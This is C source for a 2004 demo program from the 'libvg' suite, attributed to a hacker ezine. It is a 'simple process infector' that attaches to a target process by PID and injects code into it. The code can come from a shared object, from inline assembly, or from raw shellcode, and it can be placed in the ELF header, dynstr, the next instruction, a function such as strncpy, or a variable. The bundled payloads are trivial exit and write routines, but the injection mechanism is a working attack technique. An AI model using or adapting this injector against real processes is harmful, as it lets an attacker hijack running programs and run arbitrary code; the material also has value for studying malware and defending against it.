/*

 [=-- LIBVG --=]  DEMO SUITE  [=------------------------------------- v0.3 -]
 [--------------------------------------------------------------------------]
 [-- Copyright (c) 2004 Pluf ---------------------------< 7a69ezine.org >---]

 THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTY, USE AT YOUR OWN RISK

*/
#include <libvg.h>
#include "demo.h"

/*
 *	[ SIMPLE PROCESS INFECTOR ]
 *	(-------------------------)------------------------------------------
 *
 */

asm(".global INIT_CODE2");
asm(".global FINI_CODE2");

extern void INIT_CODE2();
extern void FINI_CODE2();

	/* linux asm code exit() */
char	code1[]="\x31\xc0\x31\xdb\xb3\x0a\x40\xcd\x80";

	/* linux asm code write()+exit() */
void	code2(void)
{
asm("INIT_CODE2:");
	__asm__(
		"xorl %%ebx,%%ebx\n"
		"pushl %%ebx\n"
		"pushl $0x657962\n"
		"movl %%esp,%%ecx\n"
		"movl $0x4,%%edx\n"
		"xorl %%ebx,%%ebx\n"
		"movl %%edx,%%eax\n"
		"int $0x80\n"
		"xorl %%eax,%%eax\n"
		"movb $0xf,%%bl\n"
		"inc %%eax\n"
		"int $0x80\n"
		:
		:
		);
asm("FINI_CODE2:");
}

void	help(char *progname)
{
	printf("%s\n", BANNER);

	printf("%s <pid> <method> <tag> <arg1> <arg2>\n", progname);
 
	printf("\nMethods:\n");
	printf(" A 		=  get the code from a shared object file: arg1 = shared object\n");
	printf(" B 		=  use internal code (asm tags)\n");
	printf(" C 		=  use internal code (a shellcode)\n");
	
	printf("\nTags:\n");
	printf(" hdr 		= inject the code into the hdr\n");
	printf(" dynstr 	= into the dynstr\n");
	printf(" next		= use eip (default)\n");
	printf(" function	= into a function\n");
	printf(" variable	= into a variable\n");

	printf("\nArgs:\n");
	printf(" arg1 		= shared object file\n");
	printf(" arg2		= object name or symbol name\n");

	printf("\nEjem:\n");
	printf("%s 212 A hdr /tmp/code.so /lib/libc.so.6\n", progname);
	printf("%s 212 B function strncpy\n", progname);
	printf("%s 212 B next\n", progname);
	printf("%s 212 C dynstr main\n", progname);
	printf("\n");

	exit(0);
}

/* 
 * External code: get code from a shared object 
 *
 * file : shared object file
 * str  : object/symbol name 
 */
void	example_A(unsigned long tag, char *file, char *str)
{
	if (vg_inject(tag, 0, 0, 0, file, (str?str:0))<0)
		printf("example A error: %s\n", vg_err_msg);
}

/* 
 * Internal code: asm tags (start - end of the code)
 *
 * str  : object/symbol name
 */
void	example_B(unsigned long tag, char *str)
{
	if (vg_inject(tag, INIT_CODE2, FINI_CODE2, 0, 0, (str?str:0))<0)
		printf("example B error: %s\n", vg_err_msg);
}

/*
 * Internal code: shellcode (start - size of the code)
 *
 * str  : object/symbol name
 */
void	example_C(unsigned long tag, char *str)
{
	if (vg_inject(tag, code1, 0, sizeof(code1), 0, (str?str:0))<0)
		printf("example C error: %s\n", vg_err_msg);
}

void	check_tag(unsigned long *tag, char *arg)
{
	/* default */
	*tag = VG_NEXT_INSTRUCTION;

	/* examples of using tags */
	if (!strcmp(arg, "next"))      *tag = VG_NEXT_INSTRUCTION;
	if (!strcmp(arg, "hdr"))       *tag = VG_OBJ_HDR;
	if (!strcmp(arg, "dynstr"))    *tag = VG_OBJ_DYNSTR;
	if (!strcmp(arg, "function"))  *tag = VG_FUNC;
	if (!strcmp(arg, "variable"))  *tag = VG_VAR;
}

int	main(int argc, char **argv)
{
	vg_proc		*p;
	vg_vaddr	tag;

	if (argc<2)
		help(argv[0]);

	GET_BASE;

	if (!(p = vg_init_pctx(atoi(argv[1]), 0))) {
		printf("error: %s\n", vg_err_msg);
		vg_fini_pctx(p);
		exit(0);
	}

	if (!strcmp(argv[2], "A")) {
		check_tag(&tag, argv[3]);
		example_A(tag, argv[4], argv[5]);
	}

	if (!strcmp(argv[2], "B")) {
		check_tag(&tag, argv[3]);
		example_B(tag, argv[4]);
	}

	if (!strcmp(argv[2], "C")) {
		check_tag(&tag, argv[3]);
		example_C(tag, argv[4]);
	}

	vg_save_pctx(p);
	vg_fini_pctx(p);
	return (0);
}

